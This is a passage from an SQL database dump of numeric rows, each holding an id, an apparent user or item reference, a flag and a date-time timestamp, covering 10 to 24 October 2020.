03:40:04'),(7007,1598,1,'2020-10-10','2020-10-10 05:20:06'),(7008,1604,1,'2020-10-10','2020-10-10 05:33:30'),(7009,1614,1,'2020-10-10','2020-10-10 05:43:51'),(7010,2309,1,'2020-10-10','2020-10-10 06:13:59'),(7011,108,1,'2020-10-10','2020-10-10 06:33:42'),(7012,3069,1,'2020-10-10','2020-10-10 09:38:07'),(7013,91,1,'2020-10-10','2020-10-10 10:56:21'),(7014,91,1,'2020-10-10','2020-10-10 10:56:51'),(7015,91,1,'2020-10-10','2020-10-10 10:58:11'),(7016,91,1,'2020-10-10','2020-10-10 10:58:29'),(7017,91,1,'2020-10-10','2020-10-10 10:59:17'),(7018,91,1,'2020-10-10','2020-10-10 11:01:21'),(7019,91,1,'2020-10-10','2020-10-10 11:01:48'),(7020,91,1,'2020-10-10','2020-10-10 11:02:23'),(7021,91,1,'2020-10-10','2020-10-10 11:02:47'),(7022,2609,1,'2020-10-10','2020-10-10 11:34:54'),(7023,2159,1,'2020-10-10','2020-10-10 13:06:10'),(7024,1600,1,'2020-10-10','2020-10-10 13:35:59'),(7025,3030,1,'2020-10-10','2020-10-10 15:26:01'),(7026,1600,1,'2020-10-10','2020-10-10 16:36:05'),(7027,3030,1,'2020-10-10','2020-10-10 21:40:36'),(7028,3030,1,'2020-10-11','2020-10-11 01:19:57'),(7029,68,1,'2020-10-11','2020-10-11 02:00:18'),(7030,3069,1,'2020-10-11','2020-10-11 05:54:40'),(7031,1870,1,'2020-10-11','2020-10-11 06:10:54'),(7032,108,1,'2020-10-11','2020-10-11 06:21:23'),(7033,1600,1,'2020-10-11','2020-10-11 06:51:06'),(7034,473,1,'2020-10-11','2020-10-11 08:28:18'),(7035,3081,1,'2020-10-11','2020-10-11 09:01:26'),(7036,2813,1,'2020-10-11','2020-10-11 13:13:14'),(7037,570,1,'2020-10-11','2020-10-11 14:58:01'),(7038,570,1,'2020-10-11','2020-10-11 15:00:34'),(7039,1588,1,'2020-10-11','2020-10-11 16:15:02'),(7040,1588,1,'2020-10-11','2020-10-11 16:19:29'),(7041,1600,1,'2020-10-11','2020-10-11 19:35:25'),(7042,3030,1,'2020-10-11','2020-10-11 19:55:56'),(7043,486,1,'2020-10-11','2020-10-11 21:29:28'),(7044,1747,1,'2020-10-11','2020-10-11 21:54:22'),(7045,2309,1,'2020-10-11','2020-10-11 21:56:29'),(7046,1588,1,'2020-10-12','2020-10-12 00:46:37'),(7047,1870,1,'2020-10-12','2020-10-12 02:36:31'),(7048,1600,1,'2020-10-12','2020-10-12 04:46:56'),(7049,1604,1,'2020-10-12','2020-10-12 06:07:53'),(7050,3030,1,'2020-10-12','2020-10-12 06:37:20'),(7051,2309,1,'2020-10-12','2020-10-12 07:57:18'),(7052,3004,1,'2020-10-12','2020-10-12 11:15:56'),(7053,80,1,'2020-10-12','2020-10-12 12:23:56'),(7054,80,1,'2020-10-12','2020-10-12 12:25:30'),(7055,1614,1,'2020-10-12','2020-10-12 13:21:31'),(7056,2457,1,'2020-10-12','2020-10-12 14:51:35'),(7057,2457,1,'2020-10-12','2020-10-12 14:51:38'),(7058,80,1,'2020-10-12','2020-10-12 15:03:46'),(7059,3030,1,'2020-10-12','2020-10-12 15:29:49'),(7060,80,1,'2020-10-12','2020-10-12 15:37:49'),(7061,2609,1,'2020-10-12','2020-10-12 15:48:01'),(7062,1600,1,'2020-10-12','2020-10-12 15:48:51'),(7063,1596,1,'2020-10-12','2020-10-12 17:55:27'),(7064,570,1,'2020-10-12','2020-10-12 18:27:16'),(7065,1588,1,'2020-10-12','2020-10-12 18:53:23'),(7066,1588,1,'2020-10-12','2020-10-12 18:55:29'),(7067,1582,1,'2020-10-12','2020-10-12 19:25:02'),(7068,1582,1,'2020-10-12','2020-10-12 19:25:08'),(7069,3072,1,'2020-10-12','2020-10-12 20:42:04'),(7070,1606,1,'2020-10-13','2020-10-13 01:31:30'),(7071,1718,1,'2020-10-13','2020-10-13 02:00:33'),(7072,1718,1,'2020-10-13','2020-10-13 02:02:05'),(7073,1588,1,'2020-10-13','2020-10-13 02:07:34'),(7074,1588,1,'2020-10-13','2020-10-13 02:08:00'),(7075,468,1,'2020-10-13','2020-10-13 07:16:42'),(7076,3096,1,'2020-10-13','2020-10-13 11:16:01'),(7077,3072,1,'2020-10-13','2020-10-13 11:34:50'),(7078,3072,1,'2020-10-13','2020-10-13 11:37:37'),(7079,1604,1,'2020-10-13','2020-10-13 11:41:04'),(7080,1586,1,'2020-10-13','2020-10-13 12:10:15'),(7081,2617,1,'2020-10-13','2020-10-13 12:11:48'),(7082,2617,1,'2020-10-13','2020-10-13 12:11:48'),(7083,1614,1,'2020-10-13','2020-10-13 12:13:13'),(7084,1586,1,'2020-10-13','2020-10-13 13:36:06'),(7085,89,1,'2020-10-13','2020-10-13 14:57:03'),(7086,1606,1,'2020-10-13','2020-10-13 15:00:20'),(7087,91,1,'2020-10-13','2020-10-13 15:02:22'),(7088,89,1,'2020-10-13','2020-10-13 15:04:16'),(7089,1606,1,'2020-10-13','2020-10-13 15:04:40'),(7090,1606,1,'2020-10-13','2020-10-13 15:06:30'),(7091,2989,1,'2020-10-13','2020-10-13 15:17:29'),(7092,2934,1,'2020-10-13','2020-10-13 19:50:51'),(7093,1586,1,'2020-10-13','2020-10-13 20:50:20'),(7094,2309,1,'2020-10-13','2020-10-13 23:17:29'),(7095,482,1,'2020-10-14','2020-10-14 01:29:22'),(7096,1877,1,'2020-10-14','2020-10-14 04:09:28'),(7097,3083,1,'2020-10-14','2020-10-14 04:31:00'),(7098,3083,1,'2020-10-14','2020-10-14 04:34:07'),(7099,2769,1,'2020-10-14','2020-10-14 04:36:01'),(7100,2309,1,'2020-10-14','2020-10-14 04:39:21'),(7101,89,1,'2020-10-14','2020-10-14 04:43:23'),(7102,1612,1,'2020-10-14','2020-10-14 04:43:58'),(7103,2161,1,'2020-10-14','2020-10-14 05:25:21'),(7104,570,1,'2020-10-14','2020-10-14 06:36:46'),(7105,570,1,'2020-10-14','2020-10-14 06:41:36'),(7106,2609,1,'2020-10-14','2020-10-14 06:47:03'),(7107,570,1,'2020-10-14','2020-10-14 06:47:58'),(7108,467,1,'2020-10-14','2020-10-14 08:07:39'),(7109,1598,1,'2020-10-14','2020-10-14 08:30:39'),(7110,91,1,'2020-10-14','2020-10-14 08:31:18'),(7111,2769,1,'2020-10-14','2020-10-14 09:20:59'),(7112,80,1,'2020-10-14','2020-10-14 11:05:00'),(7113,80,1,'2020-10-14','2020-10-14 11:33:47'),(7114,72,1,'2020-10-14','2020-10-14 11:36:31'),(7115,2769,1,'2020-10-14','2020-10-14 11:38:52'),(7116,1600,1,'2020-10-14','2020-10-14 14:04:18'),(7117,3041,1,'2020-10-14','2020-10-14 16:58:53'),(7118,1766,1,'2020-10-14','2020-10-14 18:25:18'),(7119,474,1,'2020-10-14','2020-10-14 18:29:43'),(7120,473,1,'2020-10-14','2020-10-14 18:30:27'),(7121,89,1,'2020-10-14','2020-10-14 18:30:48'),(7122,3102,1,'2020-10-14','2020-10-14 19:19:53'),(7123,1606,1,'2020-10-14','2020-10-14 22:30:12'),(7124,1747,1,'2020-10-14','2020-10-14 22:50:35'),(7125,488,1,'2020-10-15','2020-10-15 02:40:57'),(7126,2989,1,'2020-10-15','2020-10-15 04:26:03'),(7127,2503,1,'2020-10-15','2020-10-15 04:57:18'),(7128,2410,1,'2020-10-15','2020-10-15 05:47:11'),(7129,80,1,'2020-10-15','2020-10-15 05:47:11'),(7130,1544,1,'2020-10-15','2020-10-15 08:07:38'),(7131,1614,1,'2020-10-15','2020-10-15 10:24:50'),(7132,1614,1,'2020-10-15','2020-10-15 10:44:22'),(7133,68,1,'2020-10-15','2020-10-15 10:44:47'),(7134,2457,1,'2020-10-15','2020-10-15 10:48:47'),(7135,91,1,'2020-10-15','2020-10-15 10:49:21'),(7136,2457,1,'2020-10-15','2020-10-15 10:51:16'),(7137,2457,1,'2020-10-15','2020-10-15 10:52:05'),(7138,91,1,'2020-10-15','2020-10-15 10:52:49'),(7139,91,1,'2020-10-15','2020-10-15 10:53:51'),(7140,2457,1,'2020-10-15','2020-10-15 10:55:20'),(7141,2457,1,'2020-10-15','2020-10-15 12:13:30'),(7142,2457,1,'2020-10-15','2020-10-15 12:13:35'),(7143,91,1,'2020-10-15','2020-10-15 12:37:59'),(7144,1722,1,'2020-10-15','2020-10-15 12:39:02'),(7145,2658,1,'2020-10-15','2020-10-15 12:43:28'),(7146,1722,1,'2020-10-15','2020-10-15 12:44:00'),(7147,91,1,'2020-10-15','2020-10-15 12:44:03'),(7148,2503,1,'2020-10-15','2020-10-15 13:14:52'),(7149,2775,1,'2020-10-15','2020-10-15 13:50:44'),(7150,1600,1,'2020-10-15','2020-10-15 17:52:53'),(7151,2161,1,'2020-10-15','2020-10-15 18:50:47'),(7152,2309,1,'2020-10-15','2020-10-15 19:02:21'),(7153,1614,1,'2020-10-15','2020-10-15 19:32:01'),(7154,1614,1,'2020-10-15','2020-10-15 21:45:06'),(7155,72,1,'2020-10-15','2020-10-15 23:22:15'),(7156,3124,1,'2020-10-15','2020-10-15 23:43:42'),(7157,2410,1,'2020-10-15','2020-10-15 23:54:09'),(7158,1604,1,'2020-10-15','2020-10-15 23:54:19'),(7159,2457,1,'2020-10-16','2020-10-16 00:03:48'),(7160,2609,1,'2020-10-16','2020-10-16 01:24:36'),(7161,1588,1,'2020-10-16','2020-10-16 01:44:49'),(7162,3069,1,'2020-10-16','2020-10-16 04:22:18'),(7163,1600,1,'2020-10-16','2020-10-16 04:28:56'),(7164,1614,1,'2020-10-16','2020-10-16 07:05:47'),(7165,1718,1,'2020-10-16','2020-10-16 08:06:50'),(7166,1718,1,'2020-10-16','2020-10-16 09:14:49'),(7167,1598,1,'2020-10-16','2020-10-16 09:51:03'),(7168,1588,1,'2020-10-16','2020-10-16 12:59:28'),(7169,1600,1,'2020-10-16','2020-10-16 14:21:09'),(7170,1600,1,'2020-10-16','2020-10-16 14:21:46'),(7171,1600,1,'2020-10-16','2020-10-16 14:28:53'),(7172,68,1,'2020-10-16','2020-10-16 14:36:20'),(7173,1604,1,'2020-10-16','2020-10-16 15:48:27'),(7174,74,1,'2020-10-16','2020-10-16 16:39:12'),(7175,570,1,'2020-10-16','2020-10-16 17:56:02'),(7176,570,1,'2020-10-16','2020-10-16 18:01:03'),(7177,570,1,'2020-10-16','2020-10-16 18:10:29'),(7178,570,1,'2020-10-16','2020-10-16 18:19:18'),(7179,1582,1,'2020-10-16','2020-10-16 19:39:52'),(7180,1718,1,'2020-10-16','2020-10-16 19:41:32'),(7181,3090,1,'2020-10-16','2020-10-16 20:20:08'),(7182,2609,1,'2020-10-16','2020-10-16 20:30:15'),(7183,570,1,'2020-10-16','2020-10-16 21:10:21'),(7184,2801,1,'2020-10-16','2020-10-16 23:10:27'),(7185,1600,1,'2020-10-16','2020-10-16 23:30:15'),(7186,2159,1,'2020-10-17','2020-10-17 01:01:05'),(7187,570,1,'2020-10-17','2020-10-17 01:41:44'),(7188,1598,1,'2020-10-17','2020-10-17 04:42:44'),(7189,2309,1,'2020-10-17','2020-10-17 04:48:52'),(7190,2609,1,'2020-10-17','2020-10-17 05:23:11'),(7191,2911,1,'2020-10-17','2020-10-17 05:53:38'),(7192,1614,1,'2020-10-17','2020-10-17 08:12:38'),(7193,3104,1,'2020-10-17','2020-10-17 08:15:32'),(7194,68,1,'2020-10-17','2020-10-17 08:34:34'),(7195,1695,1,'2020-10-17','2020-10-17 10:01:55'),(7196,1695,1,'2020-10-17','2020-10-17 10:03:08'),(7197,488,1,'2020-10-17','2020-10-17 10:39:44'),(7198,570,1,'2020-10-17','2020-10-17 12:46:05'),(7199,1600,1,'2020-10-17','2020-10-17 15:06:57'),(7200,1588,1,'2020-10-17','2020-10-17 15:36:38'),(7201,473,1,'2020-10-17','2020-10-17 20:07:31'),(7202,1614,1,'2020-10-17','2020-10-17 21:42:48'),(7203,2989,1,'2020-10-17','2020-10-17 23:41:36'),(7204,1588,1,'2020-10-18','2020-10-18 01:54:03'),(7205,2309,1,'2020-10-18','2020-10-18 02:36:50'),(7206,1600,1,'2020-10-18','2020-10-18 05:02:37'),(7207,477,1,'2020-10-18','2020-10-18 09:14:07'),(7208,1695,1,'2020-10-18','2020-10-18 11:38:00'),(7209,2159,1,'2020-10-18','2020-10-18 13:19:03'),(7210,1695,1,'2020-10-18','2020-10-18 13:20:13'),(7211,1588,1,'2020-10-18','2020-10-18 15:02:28'),(7212,1594,1,'2020-10-18','2020-10-18 16:02:57'),(7213,1600,1,'2020-10-18','2020-10-18 17:34:09'),(7214,3045,1,'2020-10-18','2020-10-18 18:44:21'),(7215,91,1,'2020-10-18','2020-10-18 20:25:31'),(7216,1604,1,'2020-10-18','2020-10-18 20:35:26'),(7217,3102,1,'2020-10-18','2020-10-18 21:10:31'),(7218,2609,1,'2020-10-18','2020-10-18 22:06:57'),(7219,2813,1,'2020-10-18','2020-10-18 22:35:20'),(7220,3069,1,'2020-10-18','2020-10-18 22:48:08'),(7221,76,1,'2020-10-18','2020-10-18 22:57:38'),(7222,2159,1,'2020-10-18','2020-10-18 23:14:33'),(7223,2309,1,'2020-10-18','2020-10-18 23:17:59'),(7224,2410,1,'2020-10-19','2020-10-19 00:16:22'),(7225,1604,1,'2020-10-19','2020-10-19 00:23:07'),(7226,84,1,'2020-10-19','2020-10-19 00:25:01'),(7227,68,1,'2020-10-19','2020-10-19 00:25:31'),(7228,89,1,'2020-10-19','2020-10-19 00:38:27'),(7229,1614,1,'2020-10-19','2020-10-19 00:58:38'),(7230,1604,1,'2020-10-19','2020-10-19 01:38:52'),(7231,3034,1,'2020-10-19','2020-10-19 01:58:45'),(7232,1588,1,'2020-10-19','2020-10-19 02:48:58'),(7233,1600,1,'2020-10-19','2020-10-19 03:19:18'),(7234,1600,1,'2020-10-19','2020-10-19 03:49:08'),(7235,2751,1,'2020-10-19','2020-10-19 04:00:46'),(7236,1606,1,'2020-10-19','2020-10-19 04:22:14'),(7237,80,1,'2020-10-19','2020-10-19 04:22:48'),(7238,2159,1,'2020-10-19','2020-10-19 04:55:37'),(7239,3030,1,'2020-10-19','2020-10-19 05:49:25'),(7240,1604,1,'2020-10-19','2020-10-19 07:20:28'),(7241,1614,1,'2020-10-19','2020-10-19 08:30:27'),(7242,76,1,'2020-10-19','2020-10-19 08:30:47'),(7243,1614,1,'2020-10-19','2020-10-19 08:51:47'),(7244,1614,1,'2020-10-19','2020-10-19 10:01:08'),(7245,570,1,'2020-10-19','2020-10-19 10:39:24'),(7246,2410,1,'2020-10-19','2020-10-19 12:03:16'),(7247,1600,1,'2020-10-19','2020-10-19 12:23:16'),(7248,2159,1,'2020-10-19','2020-10-19 12:57:40'),(7249,2159,1,'2020-10-19','2020-10-19 12:58:13'),(7250,1588,1,'2020-10-19','2020-10-19 13:22:36'),(7251,468,1,'2020-10-19','2020-10-19 13:32:46'),(7252,3083,1,'2020-10-19','2020-10-19 13:42:39'),(7253,2457,1,'2020-10-19','2020-10-19 13:48:46'),(7254,1730,1,'2020-10-19','2020-10-19 14:13:06'),(7255,1604,1,'2020-10-19','2020-10-19 15:52:32'),(7256,80,1,'2020-10-19','2020-10-19 15:53:10'),(7257,1604,1,'2020-10-19','2020-10-19 15:53:51'),(7258,2457,1,'2020-10-19','2020-10-19 16:05:18'),(7259,486,1,'2020-10-19','2020-10-19 16:16:49'),(7260,2813,1,'2020-10-19','2020-10-19 16:45:47'),(7261,1604,1,'2020-10-19','2020-10-19 17:06:24'),(7262,1604,1,'2020-10-19','2020-10-19 18:06:00'),(7263,2309,1,'2020-10-19','2020-10-19 18:13:05'),(7264,108,1,'2020-10-19','2020-10-19 19:18:00'),(7265,1606,1,'2020-10-19','2020-10-19 20:31:01'),(7266,2769,1,'2020-10-19','2020-10-19 22:03:47'),(7267,3058,1,'2020-10-19','2020-10-19 22:09:16'),(7268,91,1,'2020-10-19','2020-10-19 22:34:03'),(7269,1586,1,'2020-10-19','2020-10-19 23:09:36'),(7270,3104,1,'2020-10-20','2020-10-20 00:06:30'),(7271,108,1,'2020-10-20','2020-10-20 00:08:49'),(7272,2309,1,'2020-10-20','2020-10-20 00:43:30'),(7273,486,1,'2020-10-20','2020-10-20 00:43:49'),(7274,1600,1,'2020-10-20','2020-10-20 02:11:10'),(7275,76,1,'2020-10-20','2020-10-20 02:30:00'),(7276,1586,1,'2020-10-20','2020-10-20 03:00:04'),(7277,1588,1,'2020-10-20','2020-10-20 04:00:58'),(7278,2410,1,'2020-10-20','2020-10-20 04:14:13'),(7279,2813,1,'2020-10-20','2020-10-20 04:54:01'),(7280,3030,1,'2020-10-20','2020-10-20 06:42:02'),(7281,1588,1,'2020-10-20','2020-10-20 07:53:58'),(7282,2309,1,'2020-10-20','2020-10-20 09:30:31'),(7283,2309,1,'2020-10-20','2020-10-20 09:33:57'),(7284,80,1,'2020-10-20','2020-10-20 09:41:42'),(7285,80,1,'2020-10-20','2020-10-20 10:00:57'),(7286,80,1,'2020-10-20','2020-10-20 10:03:53'),(7287,80,1,'2020-10-20','2020-10-20 10:09:21'),(7288,1606,1,'2020-10-20','2020-10-20 12:47:39'),(7289,68,1,'2020-10-20','2020-10-20 14:22:24'),(7290,1586,1,'2020-10-20','2020-10-20 16:04:56'),(7291,1586,1,'2020-10-20','2020-10-20 16:07:51'),(7292,1724,1,'2020-10-20','2020-10-20 16:33:18'),(7293,2457,1,'2020-10-20','2020-10-20 17:05:07'),(7294,87,1,'2020-10-20','2020-10-20 17:05:31'),(7295,485,1,'2020-10-20','2020-10-20 17:05:58'),(7296,3005,1,'2020-10-20','2020-10-20 17:30:44'),(7297,2309,1,'2020-10-20','2020-10-20 17:50:27'),(7298,108,1,'2020-10-20','2020-10-20 18:25:15'),(7299,1606,1,'2020-10-20','2020-10-20 18:31:49'),(7300,1604,1,'2020-10-20','2020-10-20 18:41:21'),(7301,1582,1,'2020-10-20','2020-10-20 18:51:07'),(7302,1586,1,'2020-10-20','2020-10-20 19:17:04'),(7303,76,1,'2020-10-20','2020-10-20 19:17:52'),(7304,1600,1,'2020-10-20','2020-10-20 19:21:29'),(7305,76,1,'2020-10-20','2020-10-20 19:40:58'),(7306,2769,1,'2020-10-20','2020-10-20 20:01:05'),(7307,2609,1,'2020-10-20','2020-10-20 20:01:11'),(7308,2769,1,'2020-10-20','2020-10-20 20:02:57'),(7309,2769,1,'2020-10-20','2020-10-20 20:04:04'),(7310,3058,1,'2020-10-20','2020-10-20 20:21:38'),(7311,3069,1,'2020-10-20','2020-10-20 20:22:27'),(7312,1614,1,'2020-10-20','2020-10-20 22:11:54'),(7313,3124,1,'2020-10-20','2020-10-20 22:30:11'),(7314,3056,1,'2020-10-20','2020-10-20 22:51:40'),(7315,1588,1,'2020-10-20','2020-10-20 23:46:35'),(7316,2159,1,'2020-10-21','2020-10-21 01:02:11'),(7317,1586,1,'2020-10-21','2020-10-21 01:13:16'),(7318,76,1,'2020-10-21','2020-10-21 01:18:51'),(7319,1586,1,'2020-10-21','2020-10-21 01:19:10'),(7320,1544,1,'2020-10-21','2020-10-21 01:19:30'),(7321,76,1,'2020-10-21','2020-10-21 01:20:54'),(7322,1586,1,'2020-10-21','2020-10-21 01:20:57'),(7323,335,1,'2020-10-21','2020-10-21 01:43:54'),(7324,3030,1,'2020-10-21','2020-10-21 02:02:46'),(7325,570,1,'2020-10-21','2020-10-21 02:54:56'),(7326,1600,1,'2020-10-21','2020-10-21 03:47:30'),(7327,2309,1,'2020-10-21','2020-10-21 04:04:03'),(7328,1604,1,'2020-10-21','2020-10-21 04:14:16'),(7329,3081,1,'2020-10-21','2020-10-21 04:14:19'),(7330,2159,1,'2020-10-21','2020-10-21 05:25:21'),(7331,3069,1,'2020-10-21','2020-10-21 05:32:41'),(7332,2609,1,'2020-10-21','2020-10-21 06:04:32'),(7333,2609,1,'2020-10-21','2020-10-21 07:14:37'),(7334,1614,1,'2020-10-21','2020-10-21 07:44:58'),(7335,1582,1,'2020-10-21','2020-10-21 07:55:05'),(7336,2775,1,'2020-10-21','2020-10-21 08:04:51'),(7337,1588,1,'2020-10-21','2020-10-21 09:15:10'),(7338,1598,1,'2020-10-21','2020-10-21 09:24:59'),(7339,2809,1,'2020-10-21','2020-10-21 09:45:51'),(7340,80,1,'2020-10-21','2020-10-21 09:55:10'),(7341,80,1,'2020-10-21','2020-10-21 10:02:04'),(7342,80,1,'2020-10-21','2020-10-21 10:16:01'),(7343,80,1,'2020-10-21','2020-10-21 10:21:11'),(7344,3058,1,'2020-10-21','2020-10-21 10:29:54'),(7345,2457,1,'2020-10-21','2020-10-21 10:31:36'),(7346,80,1,'2020-10-21','2020-10-21 10:32:03'),(7347,80,1,'2020-10-21','2020-10-21 10:37:22'),(7348,80,1,'2020-10-21','2020-10-21 10:41:43'),(7349,80,1,'2020-10-21','2020-10-21 10:42:48'),(7350,80,1,'2020-10-21','2020-10-21 10:42:57'),(7351,335,1,'2020-10-21','2020-10-21 10:47:27'),(7352,80,1,'2020-10-21','2020-10-21 10:53:36'),(7353,72,1,'2020-10-21','2020-10-21 11:25:56'),(7354,2904,1,'2020-10-21','2020-10-21 12:25:50'),(7355,80,1,'2020-10-21','2020-10-21 12:54:58'),(7356,3027,1,'2020-10-21','2020-10-21 13:05:52'),(7357,1604,1,'2020-10-21','2020-10-21 13:15:51'),(7358,1600,1,'2020-10-21','2020-10-21 14:05:57'),(7359,80,1,'2020-10-21','2020-10-21 14:12:34'),(7360,2309,1,'2020-10-21','2020-10-21 14:21:32'),(7361,2964,1,'2020-10-21','2020-10-21 14:36:09'),(7362,80,1,'2020-10-21','2020-10-21 14:36:37'),(7363,1604,1,'2020-10-21','2020-10-21 14:40:28'),(7364,474,1,'2020-10-21','2020-10-21 14:56:36'),(7365,2309,1,'2020-10-21','2020-10-21 15:16:49'),(7366,2309,1,'2020-10-21','2020-10-21 16:07:09'),(7367,1582,1,'2020-10-21','2020-10-21 17:23:05'),(7368,80,1,'2020-10-21','2020-10-21 18:00:18'),(7369,3069,1,'2020-10-21','2020-10-21 18:10:17'),(7370,1614,1,'2020-10-21','2020-10-21 18:30:17'),(7371,3104,1,'2020-10-21','2020-10-21 18:50:03'),(7372,3102,1,'2020-10-21','2020-10-21 19:31:08'),(7373,2769,1,'2020-10-21','2020-10-21 19:40:14'),(7374,2801,1,'2020-10-21','2020-10-21 20:08:18'),(7375,1606,1,'2020-10-21','2020-10-21 20:50:53'),(7376,1594,1,'2020-10-21','2020-10-21 21:07:32'),(7377,1606,1,'2020-10-21','2020-10-21 21:47:45'),(7378,108,1,'2020-10-21','2020-10-21 22:50:49'),(7379,72,1,'2020-10-21','2020-10-21 22:51:48'),(7380,2309,1,'2020-10-21','2020-10-21 23:23:13'),(7381,2309,1,'2020-10-21','2020-10-21 23:23:16'),(7382,3099,1,'2020-10-21','2020-10-21 23:24:16'),(7383,3099,1,'2020-10-21','2020-10-21 23:24:17'),(7384,2309,1,'2020-10-21','2020-10-21 23:30:05'),(7385,2309,1,'2020-10-21','2020-10-21 23:30:23'),(7386,2159,1,'2020-10-22','2020-10-22 00:18:07'),(7387,1604,1,'2020-10-22','2020-10-22 00:32:39'),(7388,108,1,'2020-10-22','2020-10-22 00:48:31'),(7389,84,1,'2020-10-22','2020-10-22 01:39:13'),(7390,1602,1,'2020-10-22','2020-10-22 02:55:23'),(7391,1602,1,'2020-10-22','2020-10-22 02:55:45'),(7392,2609,1,'2020-10-22','2020-10-22 03:50:18'),(7393,3063,1,'2020-10-22','2020-10-22 04:41:26'),(7394,1600,1,'2020-10-22','2020-10-22 07:12:41'),(7395,2309,1,'2020-10-22','2020-10-22 07:21:09'),(7396,2309,1,'2020-10-22','2020-10-22 07:21:11'),(7397,2309,1,'2020-10-22','2020-10-22 07:42:17'),(7398,2309,1,'2020-10-22','2020-10-22 08:02:26'),(7399,1588,1,'2020-10-22','2020-10-22 08:12:18'),(7400,1604,1,'2020-10-22','2020-10-22 08:32:17'),(7401,1586,1,'2020-10-22','2020-10-22 08:52:15'),(7402,80,1,'2020-10-22','2020-10-22 09:30:53'),(7403,80,1,'2020-10-22','2020-10-22 09:33:08'),(7404,1718,1,'2020-10-22','2020-10-22 09:42:15'),(7405,76,1,'2020-10-22','2020-10-22 09:53:45'),(7406,2252,1,'2020-10-22','2020-10-22 11:21:27'),(7407,2309,1,'2020-10-22','2020-10-22 11:28:01'),(7408,2161,1,'2020-10-22','2020-10-22 11:28:19'),(7409,91,1,'2020-10-22','2020-10-22 11:29:02'),(7410,89,1,'2020-10-22','2020-10-22 11:30:00'),(7411,2161,1,'2020-10-22','2020-10-22 11:30:02'),(7412,91,1,'2020-10-22','2020-10-22 11:30:08'),(7413,473,1,'2020-10-22','2020-10-22 11:30:45'),(7414,2813,1,'2020-10-22','2020-10-22 11:33:43'),(7415,87,1,'2020-10-22','2020-10-22 11:34:07'),(7416,91,1,'2020-10-22','2020-10-22 11:34:23'),(7417,91,1,'2020-10-22','2020-10-22 11:34:39'),(7418,91,1,'2020-10-22','2020-10-22 11:34:53'),(7419,1718,1,'2020-10-22','2020-10-22 13:03:21'),(7420,3063,1,'2020-10-22','2020-10-22 13:44:57'),(7421,1614,1,'2020-10-22','2020-10-22 14:23:02'),(7422,2617,1,'2020-10-22','2020-10-22 14:33:13'),(7423,2769,1,'2020-10-22','2020-10-22 15:13:17'),(7424,1592,1,'2020-10-22','2020-10-22 15:29:44'),(7425,1594,1,'2020-10-22','2020-10-22 16:54:05'),(7426,2309,1,'2020-10-22','2020-10-22 17:13:05'),(7427,1588,1,'2020-10-22','2020-10-22 18:14:31'),(7428,1604,1,'2020-10-22','2020-10-22 22:55:42'),(7429,1610,1,'2020-10-22','2020-10-22 23:44:57'),(7430,1586,1,'2020-10-22','2020-10-22 23:55:44'),(7431,2309,1,'2020-10-23','2020-10-23 00:32:52'),(7432,2751,1,'2020-10-23','2020-10-23 02:04:54'),(7433,1600,1,'2020-10-23','2020-10-23 02:25:51'),(7434,1606,1,'2020-10-23','2020-10-23 02:35:47'),(7435,2309,1,'2020-10-23','2020-10-23 03:06:12'),(7436,2248,1,'2020-10-23','2020-10-23 05:26:47'),(7437,1588,1,'2020-10-23','2020-10-23 06:22:03'),(7438,1588,1,'2020-10-23','2020-10-23 06:23:04'),(7439,3069,1,'2020-10-23','2020-10-23 07:17:51'),(7440,2609,1,'2020-10-23','2020-10-23 07:27:50'),(7441,1588,1,'2020-10-23','2020-10-23 07:47:58'),(7442,2309,1,'2020-10-23','2020-10-23 08:08:07'),(7443,1614,1,'2020-10-23','2020-10-23 09:18:53'),(7444,76,1,'2020-10-23','2020-10-23 09:47:06'),(7445,1582,1,'2020-10-23','2020-10-23 09:48:59'),(7446,2309,1,'2020-10-23','2020-10-23 12:29:49'),(7447,1600,1,'2020-10-23','2020-10-23 13:28:47'),(7448,1715,1,'2020-10-23','2020-10-23 13:29:11'),(7449,1600,1,'2020-10-23','2020-10-23 13:30:56'),(7450,1739,1,'2020-10-23','2020-10-23 13:31:13'),(7451,1614,1,'2020-10-23','2020-10-23 13:58:41'),(7452,2309,1,'2020-10-23','2020-10-23 14:18:33'),(7453,1600,1,'2020-10-23','2020-10-23 15:10:59'),(7454,2751,1,'2020-10-23','2020-10-23 15:31:06'),(7455,2309,1,'2020-10-23','2020-10-23 16:25:30'),(7456,2769,1,'2020-10-23','2020-10-23 16:59:24'),(7457,1614,1,'2020-10-23','2020-10-23 16:59:52'),(7458,1588,1,'2020-10-23','2020-10-23 17:11:49'),(7459,1600,1,'2020-10-23','2020-10-23 19:03:12'),(7460,1614,1,'2020-10-23','2020-10-23 21:24:20'),(7461,1582,1,'2020-10-23','2020-10-23 21:54:26'),(7462,1604,1,'2020-10-23','2020-10-23 22:24:10'),(7463,2609,1,'2020-10-23','2020-10-23 23:02:19'),(7464,2309,1,'2020-10-23','2020-10-23 23:24:26'),(7465,3069,1,'2020-10-24','2020-10-24 01:55:40'),(7466,2156,1,'2020-10-24','2020-10-24 02:05:12'),(7467,2410,1,'2020-10-24','2020-10-24 02:45:08'),(7468,2159,1,'2020-10-24','2020-10-24 02:55:24'),(7469,1588,1,'2020-10-24','2020-10-24 06:57:00'),(7470,2813,1,'2020-10-24','2020-10-24 07:11:51'),(7471,1614,1,'2020-10-24','2020-10-24 08:07:09'),(7472,1604,1,'2020-10-24','2020-10-24 09:03:10'),(7473,76,1,'2020-10-24','2020-10-24 09:06:55'),(7474,1606,1,'2020-10-24','2020-10-24 09:06:59'),(7475,470,1,'2020-10-24','2020-10-24 09:32:57'),(7476,1600,1,'2020-10-24','2020-10-24 11:36:05'),(7477,2309,1,'2020-10-24','2020-10-24 11:57:31'),(7478,1604,1,'2020-10-24','2020-10-24 12:20:31'),(7479,2457,1,'2020-10-24','2020-10-24 12:49:00'),(7480,1582,1,'2020-10-24','2020-10-24 16:03:10'),(7481,3127,1,'2020-10-24','2020-10-24 16:53:19'),(7482,2609,1,'2020-10-24','2020-10-24 17:39:15'),(7483,2503,1,'2020-10-24','2020-10-24 17:54:17'),(7484,1604,1,'2020-10-24','2020-10-24 18:10:41'),(7485,68,1,'2020-10-24','2020-10-24 18:23:44'),(7486,2503,1,'2020-10-24','2020-10-24 18:33:03'),(7487,108,1,'2020-10-24','2020-10-24 19:02:01'),(7488,1588,1,'2020-10-24','2020-10-24 19:02:03'),(7489,3069,1,'2020-10-24','2020-10-24 19:47:20'),(7490,1614,1,'2020-10-24','2020-10-24 19:57:18'),(7491,2159,1,'2020-10-24','2020-10-24 20:10:36'),(7492,80,1,'2020-10-24','2020-10-24 20:10:49'),(7493,1604,1,'2020-10-24','2020-10-24 20:17:07'),(7494,2309,1,'2020-10-24','2020-10-24 